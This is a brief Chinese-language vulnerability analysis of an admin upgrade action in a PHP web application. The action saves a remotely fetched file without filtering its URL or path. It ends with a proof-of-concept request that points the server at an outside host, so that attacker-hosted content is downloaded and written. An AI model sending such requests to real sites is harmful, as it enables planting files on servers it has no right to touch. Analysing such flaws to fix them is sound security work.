漏洞文件: /apps/admin/Lib/Action/UpgradeAction.class.php
主要问题还是出现在了180行直接将远程获取到的图片直接保存。
文中可见并没有做任何的对$downUrl进行过滤,$path也是。
所以就顺利的通过file_get_contents远程获取到了文件,然后通过file_put_contents写入到了$path当中。所以你远程文件名是啥这儿就是啥。
那么现在就来构造POC
首先看看哪里调用了step1函数
index.php?app=admin&mod=Upgrade&act=step1&upurl=http://www.metaspl0it.com/1.txt